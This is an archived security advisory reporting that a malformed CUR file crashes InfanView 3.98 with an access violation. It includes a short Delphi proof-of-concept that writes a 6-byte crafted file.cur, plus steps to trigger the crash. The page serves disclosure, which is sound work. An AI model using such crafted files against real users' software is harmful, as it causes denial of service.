InfanView 3.98 (with plugins) - Access violation at processing images CUR files

2006-08-21 / 2006-08-22
Credit: sehato
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Example (in Delphi): ===============cur.dpr=============== program cur; {$APPTYPE CONSOLE} const FileName='file.cur'; Len=6; Buf=#$00#$00#$01#$00#$00#$00; var F:File; begin AssignFile(F,FileName); Rewrite(F,1); BlockWrite(F,Buf,Len); CloseFile(F); end. ===============cur.dpr=============== 1) Compile and Run "cur.dpr" with Delphi 2) Open "file.cur" with InfanView


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top